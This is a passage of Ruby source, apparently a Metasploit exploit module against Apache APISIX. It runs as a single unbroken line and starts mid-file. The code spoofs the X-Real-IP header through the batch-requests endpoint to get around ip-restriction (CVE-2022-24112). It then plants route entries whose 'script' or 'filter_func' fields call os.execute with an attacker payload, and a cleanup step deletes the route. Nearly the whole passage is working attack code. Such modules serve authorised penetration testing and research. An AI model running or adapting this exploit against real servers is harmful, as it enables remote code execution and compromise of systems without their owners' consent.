}) else add_route end handler end def cleanup return unless @payload_uri data = { 'uri' => @payload_uri } pipeline = [ { 'path' => normalize_uri(target_uri.path, '/admin/routes/index'), 'method' => 'DELETE', 'body' => JSON.dump(data) } ] vprint_status("Deleting route #{@payload_uri}") # remove the route res = batch_request(batch_body(pipeline)) vprint_error('Unable to delete the route') unless res.code == 200 end def apisix_request(params = {}) params.merge!({ 'ctype' => 'application/json', 'headers' => { 'X-API-KEY' => datastore['API_KEY'], 'Accept' => '*/*', 'Accept-Encoding' => 'gzip, deflate' } }) send_request_cgi(params) end # Using batch request to bypass ip-restriction policies (CVE-2022-24112) def batch_request(data = nil) params = { 'uri' => normalize_uri(target_uri.path, '/batch-requests'), 'method' => 'POST' } params.merge!({ 'data' => data }) if data apisix_request(params) end def batch_body(pipeline = []) headers = { 'X-Real-IP': datastore['ALLOWED_IP'].to_s, 'X-API-KEY' => datastore['API_KEY'].to_s, 'Content-Type' => 'application/json' } { 'headers' => headers, 'timeout' => 1500, 'pipeline' => pipeline }.to_json end def base_data { 'uri' => Rex::Text.rand_text_alpha_lower(6), 'upstream' => { 'type' => 'roundrobin', 'nodes' => { Faker::Internet.domain_name.to_s => 1 } } } end def add_route # This method use the script parameter to execute the payload stub = "os.execute('PAYLOAD');".gsub('PAYLOAD', payload.raw.to_s.gsub('\'') { '\\\"' }) # binding.pry data = base_data.merge({ 'script' => stub }) uri = normalize_uri(target_uri.path, '/admin/routes') if batch_request_enabled? pipeline = [ { 'method' => 'POST', 'path' => uri, 'body' => data } ] batch_request(batch_body(pipeline)) else params = { 'method' => 'POST', 'uri' => uri, 'data' => JSON.dump(data) } apisix_request(params) end end def filter_func_exec # This method use the filter_func parameter to execute the payload stub = "function(vars) os.execute('PAYLOAD'); return true end".gsub('PAYLOAD', payload.raw.to_s.gsub('\'') { '\\\"' }) data = base_data.merge({ 'uri' => @payload_uri, 'name' => Rex::Text.rand_text_alpha_lower(6), 'filter_func' => stub }) if batch_request_enabled? pipeline = [ { 'path' => normalize_uri(target_uri.path, '/admin/routes/index'), 'method' => 'PUT', 'body' => JSON.dump(data) } ] # add the route res = batch_request(batch_body(pipeline)) vprint_error('Unable to create route') unless res.code == 200 else params = { 'method' => 'PUT', 'uri' => normalize_uri(target_uri.path, '/admin/routes/index'), 'data' => JSON.dump(data) } apisix_request(params) end end def direct_access? res = apisix_request({ 'uri' => normalize_uri(target_uri.path, '/admin/routes'), 'method' => 'GET' }) return false if [401, 403].include?(res.code) || res.body.match?(/'ip-restriction'/) true end def batch_request_enabled? res = apisix_request({ 'uri' => normalize_uri(target_uri.path, '/batch-requests'), 'method' => 'POST' }) return false if res.code == 404 true end end </code></pre>